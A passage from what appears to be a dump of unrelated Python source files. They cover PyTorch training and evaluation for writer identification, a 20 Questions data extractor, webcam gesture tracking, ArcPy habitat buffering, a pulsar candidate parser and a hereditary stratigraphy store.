            else:
                early_stop_count += 1
            best_train_acc = (epoch_train_acc if epoch_train_acc > best_train_acc else best_train_acc)
            best_val_acc = (epoch_val_acc if epoch_val_acc > best_val_acc else best_val_acc)
            best_train_loss = (epoch_train_loss if epoch_train_loss < best_train_loss else best_train_loss)
            best_val_loss = (epoch_val_loss if epoch_val_loss < best_val_loss else best_val_loss)
            if early_stop_count == self.num_epochs_early_stop:
                print(f"Early stopping at epoch {epoch + 1} triggered.")
                early_stop = True
                break
        if self.summary_writer:
            if self.hyper_params:
                self.summary_writer.add_hparams(
                    self.hyper_params,
                    {
                        "hparams/acc_train": best_train_acc,
                        "hparams/acc_val": best_val_acc,
                        "hparams/loss_train": best_train_loss,
                        "hparams/loss_val": best_val_loss,
                        # on early stop, report the epoch of the last
                        # improvement (current epoch minus the patience)
                        "hparams/num_epochs": epoch + 1 if not early_stop else epoch + 1 - self.num_epochs_early_stop
                    }
                )
            self.summary_writer.close()

    def _train(self, epoch):
        """Runs one training epoch; returns (mean batch accuracy, mean batch loss)."""
        running_train_acc = 0
        running_train_loss = 0
        self.model.train()
        for data, label in tqdm(self.train_set_loader):
            data = data.to(device=self.device)
            label = label.to(device=self.device)
            output = self.model(data)
            loss = self.criterion(output, label)
            self.optimizer.zero_grad()
            loss.backward()
            self.optimizer.step()
            # per-batch accuracy; accumulating a 0-dim tensor
            running_train_acc += (output.argmax(dim=1) == label).float().mean()
            running_train_loss += loss.item()
        # LR scheduler is stepped once per epoch, after the batch loop
        if self.scheduler:
            self.scheduler.step()
        epoch_train_acc = running_train_acc / len(self.train_set_loader)
        epoch_train_loss = running_train_loss / len(self.train_set_loader)
        return epoch_train_acc, epoch_train_loss

    @torch.no_grad()
    def _validate(self):
        """Runs one validation pass; returns (mean batch accuracy, mean batch loss)."""
        running_val_acc = 0
        running_val_loss = 0
        self.model.eval()
        for data, label in self.val_set_loader:
            data = data.to(device=self.device)
            label = label.to(device=self.device)
            output = self.model(data)
            loss = self.criterion(output, label)
            running_val_acc += (output.argmax(dim=1) == label).float().mean()
            running_val_loss += loss.item()
        epoch_val_acc = running_val_acc / len(self.val_set_loader)
        epoch_val_loss = running_val_loss / len(self.val_set_loader)
        return epoch_val_acc, epoch_val_loss
class ClassificationTester:
    """Class for testing a dataset as a classification task"""

    def __init__(self, test_set_path, model):
        """
        Args:
            test_set_path: Path to the preprocessed dataset to be tested
            model: Model to be used already set into evaluation mode and with
                loaded parameters (trained weights)
        """
        self.page_paths = glob.glob(os.path.join(test_set_path, "*/*"))
        self.model = model
        # get the same class to index mapping as in the training set based on `ImageFolder`
        self.class_to_idx = datasets.ImageFolder(os.path.join(test_set_path, os.pardir, "train")).class_to_idx
        self.num_classes = len(self.class_to_idx)

    @torch.no_grad()
    def __call__(self, device, batch_size, num_workers, top_k=None, *args, **kwargs):
        """Starts the classification-based evaluation

        Args:
            device: Device to be used (e.g. 'cuda')
            batch_size: Desired batch size (recommended: 1)
            num_workers: Number of PyTorch workers
            top_k (list, optional): Top k to be evaluated; each k should be given
                as a single entry in the list

        Returns:
            the evaluation result as a dictionary mapping k -> top-k accuracy
        """
        if top_k is None:
            top_k = [1, 2, 3, 4, 5]
        top_k_correct = {k: 0 for k in top_k}
        # BUG FIX: the original code rebound the parameter `top_k` to the
        # tensor of predicted class indices inside the page loop, so from
        # the second page on `max(top_k)` was the largest *class index* of
        # the previous page's prediction instead of the requested k.
        # Hoist the requested k once and use a distinct name for indices.
        max_k = max(top_k)
        seed = 417
        set_all_seeds(seed)
        for idx, page_path in enumerate(self.page_paths, 1):
            print(f"Testing page {idx}/{len(self.page_paths)}")
            page_class = page_path.split(os.sep)[-2]
            page_label = torch.tensor(self.class_to_idx[page_class])
            page = WriterItem(page_path, page_label, "jpg", transform=transforms.ToTensor())
            test_set_loader = DataLoader(dataset=page, shuffle=False, batch_size=batch_size, num_workers=num_workers,
                                         worker_init_fn=seed_worker, generator=torch.Generator().manual_seed(seed))
            # average the model outputs over all patches of the page
            output_avg = torch.zeros(self.num_classes).to(device=device)
            for data, _ in test_set_loader:  # label can be ignored, since one page has exactly one writer
                data = data.to(device=device)
                output = self.model(data)
                output_avg += output.mean(dim=0)
            output_avg /= len(test_set_loader)
            top_k_indices = torch.topk(output_avg, max_k, dim=0).indices
            for k in top_k_correct.keys():
                top_k_correct[k] += torch.any(top_k_indices[:k] == page_label).float().item()
        # normalize hit counts to accuracies
        for k in top_k_correct.keys():
            top_k_correct[k] /= len(self.page_paths)
        return top_k_correct
class RetrievalTester:
    """Class for testing a dataset as a retrieval task

    Given a page of a writer divided into several image patches, the output of
    the transformer encoder and the MLP head of the network are used to form a global feature vector
    for the entire page by averaging them (similar to [1]).
    Besides the soft and hard criterion, also the mAP (mean average precision) is calculated.

    Reference:
        [1] S. Fiel and R. Sablatnig, ‘Writer Identification and Retrieval Using
        a Convolutional Neural Network’, in Computer Analysis of Images and Patterns,
        vol. 9257, G. Azzopardi and N. Petkov, Eds. Cham: Springer International Publishing, 2015, pp. 26–37.
        doi: 10.1007/978-3-319-23117-4_3.
    """

    def __init__(self, feature_vector_dims, test_set_path, model):
        """
        Args:
            feature_vector_dims (tuple): Dimension of the output of the transformer encoder and
                the MLP head of the network given as tuple (dim transformer encoder, dim mlp head)
            test_set_path: Path to the preprocessed dataset to be tested
            model: Model to be used already set into evaluation mode and with
                loaded parameters (trained weights)
        """
        self.page_paths = glob.glob(os.path.join(test_set_path, "*/*"))
        self.feature_vector_dims = feature_vector_dims
        self.model = model
        # feature vectors are computed lazily on first __call__ and cached
        self.calculated_feature_vectors = False
        self.labels = None
        self.global_feature_vectors_transformer_encoder = None
        self.global_feature_vectors_mlp_head = None
        self.num_rel_docs_per_label = None

    @torch.no_grad()
    def __call__(self, device, batch_size, num_workers, soft_top_k=None, hard_top_k=None,
                 metrics=None, *args, **kwargs):
        """Starts the retrieval-based evaluation

        Args:
            device: Device to be used (e.g. 'cuda')
            batch_size: Desired batch size (recommended: 1)
            num_workers: Number of PyTorch workers
            soft_top_k (list, optional): Top k to be evaluated with the soft criterion;
                each k should be given as a single entry in the list
            hard_top_k (list, optional): Top k to be evaluated with the hard criterion;
                each k should be given as a single entry in the list
            metrics (list, optional): Distance metrics to be used for evaluation.
                Supported values see [1].

        Returns:
            the evaluation result as a dictionary

        Reference:
            [1] https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.pdist.html,
            Accessed: 2021-09-16
        """
        if soft_top_k is None:
            soft_top_k = [1, 2, 3, 4, 5]
        if hard_top_k is None:
            hard_top_k = [1]
        if metrics is None:
            metrics = ["cosine"]
        if not self.calculated_feature_vectors:
            self.labels, self.global_feature_vectors_transformer_encoder, self.global_feature_vectors_mlp_head = \
                self._calculate_feature_vectors(device, batch_size, num_workers)
            # number of *other* documents sharing each document's label
            # (-1 excludes the document itself)
            _, inv_idx, num_rel_docs_inv = self.labels.unique(return_inverse=True, return_counts=True)
            self.num_rel_docs_per_label = (num_rel_docs_inv[inv_idx] - 1)
            self.calculated_feature_vectors = True
        assert self.labels is not None and self.global_feature_vectors_transformer_encoder is not None and \
               self.global_feature_vectors_mlp_head is not None and self.num_rel_docs_per_label is not None, \
            "Feature vectors were not calculated"
        assert torch.any(
            self.num_rel_docs_per_label > 0), "Cannot perform retrieval-based evaluation: There is a writer with " \
                                              "only one document in the test set"
        return {"transformer_encoder": self._evaluate(self.global_feature_vectors_transformer_encoder, self.labels,
                                                      self.num_rel_docs_per_label, soft_top_k, hard_top_k, metrics),
                "mlp_head": self._evaluate(self.global_feature_vectors_mlp_head, self.labels,
                                           self.num_rel_docs_per_label,
                                           soft_top_k, hard_top_k, metrics)}

    @torch.no_grad()
    def _calculate_feature_vectors(self, device, batch_size, num_workers):
        """Averages per-patch features into one global vector per page.

        Returns (labels, transformer-encoder vectors, mlp-head vectors)."""
        seed = 417
        set_all_seeds(seed)
        results_intermediate_layers = {}
        # forward hook captures the transformer-encoder output (`to_latent`)
        # alongside the regular MLP-head output during each forward pass
        hook_transformer_encoder = self.model.to_latent.register_forward_hook(
            self._get_intermediate_layer(results_intermediate_layers, "to_latent"))
        global_feature_vectors_transformer_encoder = torch.zeros((len(self.page_paths), self.feature_vector_dims[0])).to(
            device=device)
        global_feature_vectors_mlp_head = torch.zeros((len(self.page_paths), self.feature_vector_dims[1])).to(
            device=device)
        labels = torch.zeros((len(self.page_paths),), dtype=torch.int)
        for idx, page_path in enumerate(self.page_paths, 0):
            print(f"Calculating feature vector for page {idx + 1}/{len(self.page_paths)}")
            page_label = page_path.split(os.sep)[-2]
            page = WriterItem(page_path, page_label, "jpg", transform=transforms.ToTensor())
            test_set_loader = DataLoader(dataset=page, shuffle=False, batch_size=batch_size, num_workers=num_workers,
                                         worker_init_fn=seed_worker, generator=torch.Generator().manual_seed(seed))
            for num_batches, (data, label) in enumerate(test_set_loader, 1):
                data = data.to(device=device)
                output = self.model(data)
                global_feature_vectors_transformer_encoder[idx] += results_intermediate_layers["to_latent"].mean(dim=0)
                global_feature_vectors_mlp_head[idx] += output.mean(dim=0)
            # average over the batches of this page
            global_feature_vectors_transformer_encoder[idx] /= num_batches
            global_feature_vectors_mlp_head[idx] /= num_batches
            labels[idx] = float(label[0])
        hook_transformer_encoder.remove()
        return labels, global_feature_vectors_transformer_encoder, global_feature_vectors_mlp_head

    @staticmethod
    def _get_intermediate_layer(activations, key):
        """Returns a forward hook storing a layer's output under `key`."""
        def hook(model, input, output):
            activations[key] = output
        return hook

    @staticmethod
    def _evaluate(global_feature_vectors, labels, num_rel_docs_per_label, soft_top_k, hard_top_k, metrics):
        """Computes soft/hard top-k and mAP per distance metric."""
        global_feature_vectors_norm = preprocessing.normalize(global_feature_vectors.detach().cpu().numpy())
        result = {}
        for m in metrics:
            result[m] = {}
            # dist_matrix rows (dim 0): distance to other documents
            # dist_matrix columns (dim 1): query documents
            # the distance on the diagonal is set to infinity, since the distance of a query document
            # to itself should not be considered
            dist_matrix = torch.from_numpy(scipy.spatial.distance.squareform(
                scipy.spatial.distance.pdist(global_feature_vectors_norm, metric=m))).float().fill_diagonal_(
                float("Inf"))
            num_docs = dist_matrix.shape[0]
            # ranking[:, q] lists document indices by increasing distance to q
            ranking = torch.topk(dist_matrix, num_docs, dim=0, largest=False).indices
            # soft criterion: at least one of the top k has the query's label
            soft_top_k_result = {}
            for k in soft_top_k:
                soft_top_k_result[k] = (labels[ranking[:k]] == labels).any(dim=0).float().mean().item()
            # hard criterion: all of the top k share the query's label
            hard_top_k_result = {}
            for k in hard_top_k:
                hard_top_k_result[k] = (labels[ranking[:k]] == labels).all(dim=0).float().mean().item()
            result[m]["soft_top_k"] = soft_top_k_result
            result[m]["hard_top_k"] = hard_top_k_result
            # mAP
            # precision@k for every rank position, per query column
            prec_at_k = (labels[ranking] == labels).float().cumsum(dim=0) / torch.arange(1, num_docs + 1).unsqueeze(
                0).t()
            rel_k = (labels[ranking] == labels).float()  # mask for filtering the relevant documents
            ap = (prec_at_k * rel_k).sum(dim=0) / num_rel_docs_per_label
            result[m]["mAP"] = (ap.sum() / num_docs).item()
        return result
class WriterItem(torch.utils.data.Dataset):
    """Dataset wrapping one handwritten page.

    A page may have been split into several image patches during
    preprocessing; every patch becomes one sample, and all samples share the
    page's label.
    """

    def __init__(self, img_dir, label, img_extension="jpg", transform=None):
        """
        Args:
            img_dir: Directory holding the page image or its patches.
            label: Label shared by every patch of this page.
            img_extension (optional): File extension/type of the images.
            transform (optional): Transformation applied to each image.
        """
        self.img_dir = img_dir
        self.label = label
        self.img_extension = img_extension
        self.transform = transform
        pattern = os.path.join(img_dir, "*." + img_extension)
        # sorted for a deterministic patch order
        self.img_paths = sorted(glob.glob(pattern))

    def __len__(self):
        """Number of image patches belonging to this page."""
        return len(self.img_paths)

    def __getitem__(self, idx):
        """Return ``(image, label)`` for the patch at position ``idx``."""
        img = Image.open(self.img_paths[idx])
        if self.transform:
            img = self.transform(img)
        # broadcast single-channel (grayscale) tensors to three channels,
        # as required by the downstream model
        if img.shape[0] == 1:
            img = img.expand(3, -1, -1)
        return img, self.label
|
996,674 | f6b0a4d6519c3b488bd967f4ab8a0e36558b1092 | """Extract subject-question-answer triples from 20 Questions game HITs.
See ``python extractquestions.py --help`` for more information.
"""
import collections
import json
import logging
import click
from scripts import _utils
logger = logging.getLogger(__name__)
# main function
@click.command(
    context_settings={
        'help_option_names': ['-h', '--help']
    })
@click.argument(
    'xml_dir',
    type=click.Path(exists=True, file_okay=False, dir_okay=True))
@click.argument(
    'output_path',
    type=click.Path(exists=False, file_okay=True, dir_okay=False))
def extractquestions(xml_dir, output_path):
    """Extract questions from XML_DIR and write to OUTPUT_PATH.
    Extract all unique subject-question-answer triples from a batch of
    20 Questions HITs. XML_DIR should be the XML directory of one of
    the 20 Questions HIT batches, extracted with AMTI. OUTPUT_PATH is
    the location to which the data will be written.
    """
    # Each submission is the form data of one HIT: a dict mapping question
    # identifiers to free text, here {'gameRoomJson': <json string>}.
    submissions = _utils.extract_xml_dir(xml_dir)
    # Deduplicate triples by their serialized JSON representation.
    unique_rows = set()
    for submission in submissions:
        game_room = json.loads(submission['gameRoomJson'])
        round_data = game_room['game']['round']
        subject = round_data['subject']
        for qna in round_data['questionAndAnswers']:
            # OrderedDict keeps subject/question/answer key order in the JSON
            triple = collections.OrderedDict([
                ('subject', subject),
                ('question', qna['question']['questionText']),
                ('answer', qna['answer']['answerValue'])
            ])
            unique_rows.add(json.dumps(triple))
    # one JSON object per line, sorted for reproducible output
    with click.open_file(output_path, 'w') as output_file:
        output_file.write('\n'.join(sorted(unique_rows)))


if __name__ == '__main__':
    extractquestions()
|
996,675 | d6e6c64dc1c42cd694ce2f871d4d7fffcdb5f246 | import redis_mover
redis_mover.start()
|
996,676 | 0be73d1b4ccf305ff2c3af24c7984ec79fa5a9ca | import time
from websocket import create_connection
import cv2
import numpy as np
from collections import deque
# Track a coloured marker with the webcam and translate large swipes into
# websocket commands ("1"/"-1"/"0"/"-0").
ws = create_connection("ws://127.0.0.1:1234/")
cap = cv2.VideoCapture(0)
# short trail of recent marker centres; maxlen bounds the gesture window
pts = deque(maxlen=10)
# NOTE(review): despite the *_green names, HSV hue 110-130 is OpenCV's *blue*
# range -- confirm which marker colour is actually intended.
Lower_green = np.array([110, 50, 50])
Upper_green = np.array([130, 255, 255])
while True:
    ret, img = cap.read()
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    kernel = np.ones((3, 3), np.uint8)
    # binary mask of pixels inside the target colour range, denoised
    mask = cv2.inRange(hsv, Lower_green, Upper_green)
    mask = cv2.erode(mask, kernel, iterations=2)
    mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
    # mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel)
    mask = cv2.dilate(mask, kernel, iterations=1)
    res = cv2.bitwise_and(img, img, mask=mask)
    # [-2:] keeps this working across OpenCV 3.x/4.x findContours signatures
    cnts, heir = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]
    center = None
    if len(cnts) > 0:
        # largest contour is assumed to be the marker
        c = max(cnts, key=cv2.contourArea)
        ((x, y), radius) = cv2.minEnclosingCircle(c)
        M = cv2.moments(c)
        try:
            center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
        except:
            # zero-area contour -> division by zero; skip this frame
            continue
        if radius > 5:
            cv2.circle(img, (int(x), int(y)), int(radius), (0, 255, 255), 2)
            cv2.circle(img, center, 5, (0, 0, 255), -1)
    pts.appendleft(center)
    for i in range(1, len(pts)):
        if pts[i - 1] is None or pts[i] is None:
            continue
        # displacement between the newest and oldest tracked centre
        if (not pts[1] is None and not pts[-1] is None):
            size_x = pts[1][0] - pts[-1][0]
            size_y = pts[1][1] - pts[-1][1]
            print(size_y,"aaaa")
            # a swipe larger than 250px in one axis fires a command; the trail
            # is cleared and a short sleep debounces repeat triggers
            if size_x > 250 and size_y < 250:
                ws.send("1")
                pts.clear()
                time.sleep(0.3)
                break;
            elif size_x < -250 and size_y > -250:
                ws.send("-1")
                pts.clear()
                time.sleep(0.3)
                break;
            elif size_y < -250 and size_x > -250:
                ws.send("0")
                print("0")
                pts.clear()
                time.sleep(0.3)
                break;
            elif size_x < 250 and size_y > 250:
                print("-0")
                ws.send("-0")
                pts.clear()
                time.sleep(0.3)
                break;
# NOTE(review): unreachable -- the while loop above never exits.
ws.close()
|
996,677 | 692184990b7b3cf751260a867a3558d85bd80d53 | import yaml,sys,os
sys.path.append(os.getcwd())
def get_data():
    """Load login test data from the YAML fixture file.

    Reads ``G/web/Data/login_data.yaml`` and flattens its "data" section into
    ``(uname, pwd)`` tuples, one per test case, in file order.

    Returns:
        list[tuple]: (username, password) pairs.
    """
    data_list = []
    with open('G/web/Data/login_data.yaml', 'r', encoding='utf-8') as f:
        readdata = f.read()
    # yaml.load() without an explicit Loader is unsafe on untrusted input and
    # raises TypeError on PyYAML >= 6; safe_load parses plain data safely.
    data = yaml.safe_load(readdata).get("data")
    print(data)
    for i in data:
        for o in i.keys():
            data_list.append((i.get(o).get('uname'), i.get(o).get('pwd')))
    return data_list
|
996,678 | e7cda37573525634c2975e52b07ee6491339b895 | class Solution(object):
def pivotIndex(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
soln_arr = []
for i, val in enumerate(nums):
lsum = self.calcSum(nums, 0, i)
rsum = self.calcSum(nums, i+1, len(nums))
if lsum == rsum:
soln_arr.append(i)
if len(soln_arr):
return soln_arr.pop(0)
else:
return -1
def calcSum(self, arr, start, end):
sum = 0
for x in range(start, end):
sum += arr[x]
return sum
|
996,679 | 678ef9db58d74fdb9627b1cbd845e58836698e5a | import arcpy
import os
# A1 AND A2 ZONES - DATA CLEANING
# workspace
tempgdb = r"C:\Users\rithi\Downloads\Thesis\Workspace\scratch\B2.gdb" # CHANGE
gdb = r"C:\Users\rithi\Downloads\Thesis\Workspace\BGI_invest.gdb"
arcpy.env.overwriteOutput = True
arcpy.env.workspace = gdb
# checkout spatial extension
arcpy.CheckExtension('Spatial')
arcpy.CheckOutExtension("Spatial")
habitatLayer = "B1_Intertidal" # CHANGE
biobands = ["BARN", "BLMU", "BIOF", "BRBA", "EELG", "FFRA", "GRAL", "ROCK", "SAMB", "SOBK"] # CHANGE
splashBiobands = ["BLLI", "LICH", "WHLI"]
# cleaning layers: for every bioband, keep features flagged Continuous ('C')
# plus Patchy ('P') features with 26-50% cover and >95 length, and copy the
# selection into the scratch geodatabase as "clean<BIOBAND>"
for bioband in biobands:
    featurelyr = arcpy.MakeFeatureLayer_management(habitatLayer, habitatLayer + 'lyr')
    xpr1 = 'BioBand_'+ bioband + " " + "= 'C'"
    arcpy.SelectLayerByAttribute_management(featurelyr, "NEW_SELECTION", "{}".format(xpr1))
    xpr1 = 'BioBand_' + bioband + " " + "= 'P' AND " + "BioBand_" + bioband + "_PCV" + " " + "= '26-50'" + " " + "AND" + " " + "BioBand_" + bioband + "_L" + " " + "= '>95'"
    print(xpr1)
    arcpy.SelectLayerByAttribute_management(featurelyr, "ADD_TO_SELECTION", "{}".format(xpr1))
    # NOTE(review): "\c" is a literal backslash + 'c' (not an escape), so this
    # works, but a raw string or os.path.join would be clearer.
    arcpy.CopyFeatures_management(featurelyr, tempgdb + "\clean" + bioband)
# setting new workspace and list variables
arcpy.env.workspace = tempgdb
print("setting up buffer workspace")
shapes = ["cleanBARN", "cleanBLMU", "cleanBIOF", "cleanBRBA", "cleanEELG", "cleanFFRA", "cleanGRAL", "cleanROCK", "cleanSAMB", "cleanSOBK"] # CHANGE
biobands = ["BARN", "BLMU", "BIOF", "BRBA", "EELG", "FFRA", "GRAL", "ROCK", "SAMB", "SOBK"] # CHANGE
# make a list of all the LEFT and RIGHT unit identifiers
# (used later to decide which side of the unit line each buffer goes;
# sets would make the membership tests below O(1), lists work but are O(n))
fcL = r'C:\Users\rithi\Downloads\Thesis\Workspace\BGI_invest.gdb\UnitLines_LEFT'
fcR = r'C:\Users\rithi\Downloads\Thesis\Workspace\BGI_invest.gdb\UnitLines_RIGHT'
fields = ['Unit_lines_PHY_IDENT']
ids_LEFT = []
ids_RIGHT = []
with arcpy.da.SearchCursor(fcL, fields) as cursor:
    for row in cursor:
        ids_LEFT.append(row[0])
with arcpy.da.SearchCursor(fcR, fields) as cursor:
    for row in cursor:
        ids_RIGHT.append(row[0])
# Pair each cleaned layer with its own bioband code: shapes[i] == "clean" + biobands[i].
# BUG FIX: the original nested loops ("for shape in shapes: for bioband in
# biobands:") ran the update cursor once per (shape, bioband) combination,
# re-adding the two fields repeatedly and overwriting buffer_dist with values
# from whichever bioband happened to be processed last.
for shape, bioband in zip(shapes, biobands):
    arcpy.AddField_management(shape, "buffer_dist", "FLOAT", "")
    arcpy.AddField_management(shape, "buffer_dir", "TEXT", "")
    cursorCurrent = arcpy.UpdateCursor(shape)
    # add buffer distance: width codes (M/N/W, any case) take a fixed width,
    # otherwise the percent-cover class scales a 40 m maximum
    for row in cursorCurrent:
        if row.getValue('BioBand_' + bioband) == 'M':
            row.setValue("buffer_dist", 3)
        elif row.getValue('BioBand_' + bioband) == 'm':
            row.setValue("buffer_dist", 3)
        elif row.getValue('BioBand_' + bioband) == 'N':
            row.setValue("buffer_dist", 0.5)
        elif row.getValue('BioBand_' + bioband) == 'n':
            row.setValue("buffer_dist", 0.5)
        elif row.getValue('BioBand_' + bioband) == 'W':
            row.setValue("buffer_dist", 7.5)
        elif row.getValue('BioBand_' + bioband) == 'w':
            row.setValue("buffer_dist", 7.5)
        elif row.getValue('BioBand_' + bioband + "_PCV") == '<5':
            row.setValue("buffer_dist", 0.05 * 40)
        elif row.getValue('BioBand_' + bioband + "_PCV") == '5-25':
            row.setValue("buffer_dist", 0.15 * 40)
        elif row.getValue('BioBand_' + bioband + "_PCV") == '26-50':
            row.setValue("buffer_dist", 0.38 * 40)
        elif row.getValue('BioBand_' + bioband + "_PCV") == '51-75':
            row.setValue("buffer_dist", 0.63 * 40)
        elif row.getValue('BioBand_' + bioband + "_PCV") == '76-95':
            row.setValue("buffer_dist", 0.855 * 40)
        elif row.getValue('BioBand_' + bioband + "_PCV") == '>95':
            row.setValue("buffer_dist", 40)
        # the side of the unit line determines the buffer direction;
        # unknown identifiers default to RIGHT
        if row.getValue('Unit_lines_PHY_IDENT') in ids_LEFT:
            row.setValue("buffer_dir", "LEFT")
        elif row.getValue('Unit_lines_PHY_IDENT') in ids_RIGHT:
            row.setValue("buffer_dir", "RIGHT")
        else:
            row.setValue("buffer_dir", "RIGHT")
        cursorCurrent.updateRow(row)
print("buffer direction and distance fields set")
# delete cursor to release the schema lock (the original's doubled
# "cursorCurrent=cursorCurrent=None" assignment was redundant)
cursorCurrent = None
# split into left buffer and right unit shapefiles
# (each cleaned layer becomes <shape>LEFT and <shape>RIGHT based on buffer_dir)
for shape in shapes:
    featurelyr = arcpy.MakeFeatureLayer_management(shape, shape + 'lyr1')
    xpr1 = "buffer_dir = 'LEFT'"
    arcpy.SelectLayerByAttribute_management(featurelyr, "NEW_SELECTION", "{}".format(xpr1))
    arcpy.CopyFeatures_management(featurelyr, shape + "LEFT")
    featurelyr = arcpy.MakeFeatureLayer_management(shape, shape + 'lyr2')
    xpr1 = "buffer_dir = 'RIGHT'"
    arcpy.SelectLayerByAttribute_management(featurelyr, "NEW_SELECTION", "{}".format(xpr1))
    arcpy.CopyFeatures_management(featurelyr, shape + "RIGHT")
# Add buffers and merge into final sub-zone polygons
# (geodesic flat-ended buffers, sided per the buffer_dir split above)
for shape in shapes:
    arcpy.Buffer_analysis(shape + "LEFT", shape + "LEFT_B", "buffer_dist", "LEFT", "FLAT", "", "", "GEODESIC")
    arcpy.Buffer_analysis(shape + "RIGHT", shape + "RIGHT_B", "buffer_dist", "RIGHT", "FLAT", "", "", "GEODESIC")
# manually move left and right units according to Zone location
# uncomment the following lines, comment everything else above'
#
# import arcpy
# tempgdb = r"C:\Users\rithi\Downloads\Thesis\Workspace\scratch\B2.gdb" # CHANGE
# arcpy.env.overwriteOutput = True
# arcpy.env.workspace = tempgdb
# arcpy.CheckExtension('Spatial')
# arcpy.CheckOutExtension("Spatial")
#
# shapes = ["cleanBARN", "cleanBLMU", "cleanBIOF", "cleanBRBA", "cleanEELG", "cleanFFRA", "cleanGRAL", "cleanROCK", "cleanSAMB", "cleanSOBK"] # CHANGE
# biobands = ["BARN", "BLMU", "BIOF", "BRBA", "EELG", "FFRA", "GRAL", "ROCK", "SAMB", "SOBK"] # CHANGE
#
#
# for shape in shapes:
#     minputs = [shape + "LEFT_B", shape + "RIGHT_B"]
#     arcpy.Merge_management(minputs, shape+"_B2P") # CHANGE
arcpy.CheckInExtension("Spatial")
|
996,680 | d4d1f6d79cc4dedd4a3c475077bc29c89d140e90 | import re
import xml.etree.cElementTree as ET
import numpy
################################################################################
def readDataBlock(xmlnode):
    """Turn any 'DataBlock' XML node into a numpy array of floats.

    The node's text is a hex dump of byte values (one byte per sample); each
    byte is rescaled linearly from [0, 255] into the [min, max] range given
    by the node's 'min'/'max' attributes.
    """
    lo = float(xmlnode.get('min'))
    hi = float(xmlnode.get('max'))
    # strip all whitespace (tabs/newlines/spaces) from the hex dump
    hexdump = re.sub(r"\s", "", xmlnode.text)
    samples = numpy.asarray(bytearray.fromhex(hexdump), dtype=float)
    return samples * (hi - lo) / 255. + lo
class Candidate(object):
    """One pulsar candidate parsed from a PHCX file (coordinates, PDMP
    best-fit values, sub-integration matrix and folded profile)."""

    def __init__(self, fname):
        """Build a new Candidate object from a PHCX file path.

        Raises:
            ValueError: if the file has no PDMP Section.
        """
        xmlroot = ET.parse(fname).getroot()
        # Read CentreFreq and BandWidth
        coordNode = xmlroot.find('head')
        self.fc = float(coordNode.find('CentreFreq').text)
        self.bw = float(coordNode.find('BandWidth').text)
        # Get PDMP section (the last matching Section wins, as before).
        # BUG FIX: opt_section used to stay unbound (NameError) when no pdmp
        # section existed; fail with an explicit error instead.
        opt_section = None
        for section in xmlroot.findall('Section'):
            if 'pdmp' in section.get('name').lower():
                opt_section = section
        if opt_section is None:
            raise ValueError("no PDMP section found in %r" % fname)
        # Best values as returned by PDMP.
        # BUG FIX: Element.getchildren() was removed in Python 3.9;
        # iterating the element directly is the supported equivalent.
        opt_values = {
            node.tag: float(node.text)
            for node in opt_section.find('BestValues')
        }
        self.bary_period = opt_values['BaryPeriod']
        self.dm = opt_values['Dm']
        self.snr = opt_values['Snr']
        self.width = opt_values['Width']
        ### Sub-Integrations
        subintsNode = opt_section.find('SubIntegrations')
        self.nsubs = int(subintsNode.get('nSub'))
        self.nbins = int(subintsNode.get('nBins'))
        self.subints = readDataBlock(subintsNode).reshape(self.nsubs, self.nbins)
        ### Profile
        profileNode = opt_section.find('Profile')
        self.profile = readDataBlock(profileNode)
        self.nbins_profile = int(profileNode.get('nBins'))
################################################################################
if __name__ == '__main__':
    import os
    # Load example.phcx file (must be in the same directory as this python script)
    directory, fname = os.path.split(
        os.path.abspath(__file__)
    )
    # smoke test: parse the bundled example candidate
    cand = Candidate(
        os.path.join(directory, 'example.phcx')
    )
|
996,681 | 0902a3e01e5d32dcb22507ad8afe6f8d0fb77d6e | from copy import copy
import operator
import typing
from interval_search import binary_search
from .._HereditaryStratum import HereditaryStratum
from ._detail import HereditaryStratumOrderedStoreBase
class HereditaryStratumOrderedStoreList(HereditaryStratumOrderedStoreBase):
    """Interchangeable backing container for HereditaryStratigraphicColumn.

    Stores deposited strata using a list implementation. Retained strata are
    stored from most ancient (index 0, front) to most recent (back). Cloned
    stores instantiate an independent list (although strata are not deepcopied
    themselves).

    Potentially useful in scenarios where moderate strata counts are retained,
    many strata are deposited without column cloning, deleted strata tend to
    be more recent (i.e., not more ancient and toward the front of the list),
    or many comparisons to estimate most recent common ancestor are made
    between stratigraphic columns.
    """

    __slots__ = ("_data",)

    # strata stored from most ancient (index 0, front) to most recent (back)
    _data: typing.List[HereditaryStratum]

    def __init__(self: "HereditaryStratumOrderedStoreList"):
        """Initialize instance variables."""
        self._data = []

    def __eq__(
        self: "HereditaryStratumOrderedStoreList",
        other: "HereditaryStratumOrderedStoreList",
    ) -> bool:
        """Compare for value-wise equality."""
        # adapted from https://stackoverflow.com/a/4522896
        # compares every __slots__ attribute of self and other pairwise
        return (
            isinstance(
                other,
                self.__class__,
            )
            and self.__slots__ == other.__slots__
            and all(
                getter(self) == getter(other)
                for getter in [
                    operator.attrgetter(attr) for attr in self.__slots__
                ]
            )
        )

    def DepositStratum(
        self: "HereditaryStratumOrderedStoreList",
        rank: typing.Optional[int],
        stratum: "HereditaryStratum",
    ) -> None:
        """Insert a new stratum into the store.

        Parameters
        ----------
        rank : typing.Optional[int]
            The position of the stratum being deposited within the sequence of strata deposited into the column. Precisely, the number of strata that have been deposited before stratum.
            (Unused by this list-backed implementation: strata are simply
            appended, so rank order follows deposition order.)
        stratum : HereditaryStratum
            The stratum to deposit.
        """
        self._data.append(stratum)

    def GetNumStrataRetained(self: "HereditaryStratumOrderedStoreList") -> int:
        """How many strata are present in the store?

        May be fewer than the number of strata deposited if deletions have
        occurred.
        """
        return len(self._data)

    def GetStratumAtColumnIndex(
        self: "HereditaryStratumOrderedStoreList",
        index: int,
        # needed for other implementations
        get_rank_at_column_index: typing.Optional[typing.Callable] = None,
    ) -> HereditaryStratum:
        """Get the stratum positioned at index i among retained strata.

        Index order is from most ancient (index 0) to most recent.

        Parameters
        ----------
        index : int
            The position among retained strata of the stratum to fetch.
        get_rank_at_column_index : callable, optional
            Unused here; accepted only for interface parity with other store
            implementations.
        """
        return self._data[index]

    def GetRankAtColumnIndex(
        self: "HereditaryStratumOrderedStoreList",
        index: int,
